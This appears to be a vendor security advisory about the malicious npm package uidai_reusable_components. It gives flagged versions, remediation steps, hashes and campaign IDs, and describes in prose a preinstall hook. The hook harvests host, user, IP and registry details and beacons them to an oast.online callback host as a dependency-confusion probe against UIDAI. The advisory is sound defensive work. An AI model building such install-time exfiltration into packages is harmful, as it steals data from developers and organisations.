Which versions of uidai_reusable_components are malicious?

The following npm versions of uidai_reusable_components are flagged malicious: 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6. Treat any of these as compromised.

How do I remediate uidai_reusable_components if I installed it?

Remove uidai_reusable_components from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is uidai_reusable_components part of a known attack campaign?

Yes — uidai_reusable_components is associated with the IN-MAL-2026-006778, IN-MAL-2026-006782, IN-MAL-2026-006783, IN-MAL-2026-006781, IN-MAL-2026-006780 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect uidai_reusable_components in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking uidai_reusable_components and packages like it before any post-install script runs.

Malicious package

uidai_reusable_componentsnpm

Malicious code in uidai_reusable_components (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5910

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall uidai_reusable_components

What this malware does

On npm install, the preinstall lifecycle script in package.json executes an inline Node one-liner that collects the installer's hostname, OS username, NODE_ENV, current working directory, local IPv4 addresses (via ipconfig|findstr IPv4 on Windows or hostname -I on Linux), the configured npm registry URL (npm config get registry), and Windows USERDOMAIN / Unix id output. The collected data is URL-encoded and embedded as a subdomain label in an HTTP GET to *.d8ofndiplbq1d996mde0a9yukto9dm49e.oast.online, an Interactsh out-of-band callback host controlled by the package author. The package's own description states it is a 'PoC for dependency confusion' targeting the UIDAI (Aadhaar / India's national identity authority) internal namespace, and the harvested private npm registry URL is the canonical signal an attacker uses to confirm a dependency-confusion victim. The package ships no actual UI component functionality — its only effect on install is the exfiltration beacon.

Malicious versions

5 flagged

0.4.20.4.30.4.40.4.50.4.6

Indicators of compromise (SHA-256)

07412d7d93be2bfbfe6510e13f25337428f6f674dff3e9e59a3611c4658fb718

c3499d3f8b50db4c19b076b39663e10741085deb77e06ce68cacb59db95c7b20

0c7fb1e2d727f27dc7d200d2989650e5737e8411f3c576954881e097d6caf891

5875a720dc1cfc6e30a67b003fc43975fbef2e11352e715e19e55e54dd84ae67

7dce3c0ea19df5921a7f46b05edefe321c9df8af6c7f6c81d1a86251c72446f7

Frequently asked questions

No. uidai_reusable_components on npm has been identified as a malicious package (versions 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006778IN-MAL-2026-006782IN-MAL-2026-006783IN-MAL-2026-006781IN-MAL-2026-006780

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection